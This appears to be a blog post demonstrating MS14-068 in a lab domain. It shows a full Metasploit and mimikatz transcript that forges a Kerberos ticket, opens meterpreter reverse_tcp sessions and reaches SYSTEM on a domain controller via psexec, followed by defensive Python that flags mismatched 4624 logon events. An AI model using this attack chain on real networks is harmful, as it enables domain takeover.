MS14-068: exploitation with Metasploit
2016-06-17 11:32
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD                   yes       The Domain User password
   RHOST                      yes       The target address
   RPORT     88               yes       The target port
   Timeout   10               yes       The TCP timeout to establish connection and read data
   USER                       yes       The Domain User
   USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN DEMO.LOCAL
DOMAIN => DEMO.LOCAL
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD juan
PASSWORD => juan
msf auxiliary(ms14_068_kerberos_checksum) > set USER juan
USER => juan
msf auxiliary(ms14_068_kerberos_checksum) > set USER_SID S-1-5-21-1755879683-3641577184-3486455962-1000
USER_SID => S-1-5-21-1755879683-3641577184-3486455962-1000
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST WIN-F46QAN3U3UH.demo.local
RHOST => WIN-F46QAN3U3UH.demo.local
msf auxiliary(ms14_068_kerberos_checksum) > run

Validating options...
Using domain DEMO.LOCAL...
WIN-F46QAN3U3UH.demo.local:88 - Sending AS-REQ...
WIN-F46QAN3U3UH.demo.local:88 - Parsing AS-REP...
WIN-F46QAN3U3UH.demo.local:88 - Sending TGS-REQ...
[+] WIN-F46QAN3U3UH.demo.local:88 - Valid TGS-Response, extracting credentials...
[+] WIN-F46QAN3U3UH.demo.local:88 - MIT Credential Cache saved on /Users/jvazquez/.msf4/loot/20141223201326_default_172.16.158.135_windows.kerberos_194320.bin
Auxiliary module execution completed
----------------------------------------------
mimikatz # kerberos::clist "20141223201326_default_172.16.158.135_windows.kerberos_194320.bin" /export
Principal : (01) : juan ; @ DEMO.LOCAL

Data 0
    Start/End/MaxRenew: 12/24/2014 3:13:21 AM ; 12/24/2014 1:13:06 PM ; 12/31/2014 3:13:06 AM
    Service Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
    Target Name  (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
    Client Name  (01) : juan ; @ DEMO.LOCAL
    Flags 00000000    :
    Session Key       : 0x00000017 - rc4_hmac_nt
      1cf7188debe40565eb668b5fa0bf94fb
    Ticket            : 0x00000000 - null ; kvno = 2
    [...]
    * Saved to file 0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi !
mimikatz #
---------------------------------------------

msf auxiliary(ms14_068_kerberos_checksum) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > exploit
Started reverse handler on 172.16.158.1:4444
Starting the payload handler...
Sending stage (770048 bytes) to 172.16.158.131

meterpreter > getuid
Server username: DEMO\juan
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.0 alpha (x86/win32) release "Kiwi en C"
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */
success.
meterpreter > kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi
Using Kerberos ticket stored in /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi, 1143 bytes
[+] Kerberos ticket applied successfully
meterpreter >
meterpreter > background
Backgrounding session 1...
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information            Connection
  --  ----                   -----------            ----------
  1   meterpreter x86/win32  DEMO\juan @ EXPLOITER  172.16.158.1:4444 -> 172.16.158.131:63380 (172.16.158.131)

msf exploit(handler) > use exploit/windows/local/current_user_psexec
msf exploit(current_user_psexec) > set TECHNIQUE PSH
TECHNIQUE => PSH
msf exploit(current_user_psexec) > set RHOSTS WIN-F46QAN3U3UH.demo.local
RHOSTS => WIN-F46QAN3U3UH.demo.local
msf exploit(current_user_psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(current_user_psexec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(current_user_psexec) > set SESSION 1
SESSION => 1
msf exploit(current_user_psexec) > exploit
Started reverse handler on 172.16.158.1:4444
WIN-F46QAN3U3UH.demo.local Creating service 51cq2zJN6p
WIN-F46QAN3U3UH.demo.local Starting the service
Sending stage (770048 bytes) to 172.16.158.135
WIN-F46QAN3U3UH.demo.local Deleting the service
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
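Seen from the defender's side, the transcript above ends with the ordinary domain user juan holding NT AUTHORITY\SYSTEM on the domain controller by way of a ticket whose PAC the KDC accepted without a valid signature. One published indicator for exploitation of this bug (CVE-2014-6324) is a Security event 4624 in which the Security ID does not correspond to the Account Name. The Python below is an added example, not part of the original post and not Metasploit or mimikatz code: it reads constructed, flattened 4624 records, resolves each Security ID through a constructed SID-to-name table (only the domain SID prefix is taken from the USER_SID used on this page), and reports logons whose SID is unresolvable or names a different account than the one logged. The one-line record format, the table and the sample events are assumptions made for the example; real events come out of EVTX as XML.

```python
"""Flag 4624 logon events whose Security ID does not agree with the Account Name.

Added example for this page (not Metasploit, mimikatz or the post author's code).
The event lines and the SID-to-name table are constructed; only the domain SID
prefix comes from the USER_SID shown in the transcript above.
"""
import re
from typing import Dict, List, Optional

DOMAIN_SID = "S-1-5-21-1755879683-3641577184-3486455962"

# Constructed resolver. In a real deployment this is an LDAP / SAM lookup on the DC.
SID_TO_NAME: Dict[str, str] = {
    "S-1-5-18": "SYSTEM",
    DOMAIN_SID + "-500": "Administrator",
    DOMAIN_SID + "-1000": "juan",
    DOMAIN_SID + "-1001": "maria",
}

# Constructed, flattened event records: "<EventID> <field>: <value> ...".
# Real 4624 events are EVTX/XML; the flat form exists only for this example.
SAMPLE_EVENTS = """\
4624 Security ID: S-1-5-21-1755879683-3641577184-3486455962-1000 Account Name: juan Logon Type: 3 Source Network Address: 172.16.158.131
4624 Security ID: S-1-5-21-1755879683-3641577184-3486455962-500 Account Name: juan Logon Type: 3 Source Network Address: 172.16.158.131
4672 Security ID: S-1-5-21-1755879683-3641577184-3486455962-500 Account Name: juan
4624 Security ID: S-1-5-21-1755879683-3641577184-3486455962-1337 Account Name: svc-backup Logon Type: 3 Source Network Address: 10.0.0.7
4624 Security ID: S-1-5-21-1755879683-3641577184-3486455962-1001 Account Name: MARIA Logon Type: 2 Source Network Address: -
4624 Security ID: S-1-5-18 Account Name: SYSTEM Logon Type: 5 Source Network Address: -
"""

FIELD_RE = re.compile(r"(Security ID|Account Name|Logon Type|Source Network Address):\s*(\S+)")


def parse_event(line: str) -> Optional[dict]:
    """Parse one flattened record; return None unless it is a 4624 with both key fields."""
    parts = line.strip().split(maxsplit=1)
    if len(parts) != 2 or parts[0] != "4624":
        return None
    fields = dict(FIELD_RE.findall(parts[1]))
    if "Security ID" not in fields or "Account Name" not in fields:
        return None
    return fields


def find_sid_mismatches(lines, sid_to_name: Dict[str, str] = SID_TO_NAME) -> List[dict]:
    """Return one finding per 4624 whose SID is unresolvable or names a different account.

    Account names are compared case-insensitively, as Windows does.
    """
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        sid, name = ev["Security ID"], ev["Account Name"]
        resolved = sid_to_name.get(sid)
        if resolved is None:
            reason = "unresolvable SID"
        elif resolved.casefold() != name.casefold():
            reason = f"SID resolves to {resolved!r} but event names {name!r}"
        else:
            continue  # consistent logon, nothing to report
        findings.append({
            "sid": sid,
            "account": name,
            "source": ev.get("Source Network Address", "-"),
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in find_sid_mismatches(SAMPLE_EVENTS.splitlines()):
        print(f"[!] 4624 from {f['source']}: account {f['account']} / {f['sid']}: {f['reason']}")
```

Running the block prints two findings: the logon that carries the Administrator RID under juan's name, and the logon with a SID the table cannot resolve. The 4672 record is ignored on purpose, since the check is defined on 4624. The remediation itself is the MS14-068 update (KB3011780) on every domain controller; a check like this one is for finding forged-PAC logons that happened before the update was applied.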